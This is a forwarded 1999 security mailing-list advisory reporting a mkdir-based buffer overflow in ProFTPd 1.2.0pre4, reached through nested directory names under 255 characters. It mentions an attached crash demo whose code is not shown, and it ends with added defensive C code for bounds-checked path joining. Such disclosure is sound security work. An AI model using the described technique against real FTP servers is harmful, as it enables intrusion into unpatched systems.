Date: Sun, 5 Sep 1999 13:45:56 +0200
From: Jan-Philip Velders <[email protected]>
To: [email protected]
Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4, supposed to be 'safe' (fwd)
---------- Forwarded message ----------
Date: Sun, 05 Sep 1999 02:08:29 +0200 (CEST)
From: Renaud Deraison <[email protected]>
To: [email protected]
Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4, supposed to be 'safe'
Resent-Date: Sun, 05 Sep 1999 06:16:54 +0000
Resent-From: [email protected]
Resent-cc: recipient list not shown: ;
Hello,

ProFTPd, an FTP server, has been suffering from several security holes lately.
However, version 1.2.0pre4 is still vulnerable to a mkdir attack,
even though it is supposed to be patched against it.

The trick is to create directories whose names don't exceed 255 chars.

I have not looked at this problem in detail, but I could at least make a
pointer point to a bogus location (85858585) using this method.

Attached to this mail is a C program that will make proftpd crash, but
which won't exploit the vulnerability.

Thank you for your attention,

-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org
Attachment: crash_ftpd.c (demo code, base64-encoded)
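
An added example, not part of the original message and not ProFTPd's code: a bounds-checked path join in C showing why a 255-character limit on each directory name does not by itself bound the full path. It assumes the overflow comes from the accumulated path, which the report does not confirm; `PATH_CAP`, `name_ok`, `path_append_checked` and `nest_until_rejected` are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

#define NAME_LIMIT 255   /* per-name limit mentioned in the report */
#define PATH_CAP   1024  /* assumed path buffer size, not from the report */

/* The per-name test on its own: passes any name of 1..NAME_LIMIT chars. */
static int name_ok(const char *name)
{
    size_t n = strlen(name);
    return n > 0 && n <= NAME_LIMIT && strchr(name, '/') == NULL;
}

/* Append name to the NUL-terminated path in buf (capacity cap).
 * Returns 0 on success, -1 if the name fails name_ok() or the joined
 * path would not fit; buf is left untouched on failure. */
static int path_append_checked(char *buf, size_t cap, const char *name)
{
    const char *end;
    size_t cur, add, sep;
    if (buf == NULL || name == NULL || cap == 0 || !name_ok(name))
        return -1;
    end = memchr(buf, '\0', cap);
    if (end == NULL) return -1;      /* unterminated buffer: refuse */
    cur = (size_t)(end - buf);
    add = strlen(name);
    sep = (cur == 0 || buf[cur - 1] != '/') ? 1 : 0;
    /* need cur + sep + add + 1 <= cap, tested without size_t wraparound */
    if (add > cap - cur - 1 || sep > cap - cur - 1 - add)
        return -1;
    if (sep) buf[cur++] = '/';
    memcpy(buf + cur, name, add);
    buf[cur + add] = '\0';
    return 0;
}

/* Constructed input: nest up to `tries` directories named with `len`
 * 'X' characters under "/" and return how many appends were accepted. */
static int nest_until_rejected(size_t len, int tries)
{
    char path[PATH_CAP] = "/";
    char name[NAME_LIMIT + 1];
    int i, accepted = 0;
    if (len == 0 || len > NAME_LIMIT) return -1;
    memset(name, 'X', len);
    name[len] = '\0';
    for (i = 0; i < tries; i++)
        accepted += (path_append_checked(path, sizeof path, name) == 0);
    return accepted;
}
```

With the constructed 254-character names, every name passes `name_ok`, yet only four levels fit in the assumed 1024-byte buffer before the cumulative check refuses further appends.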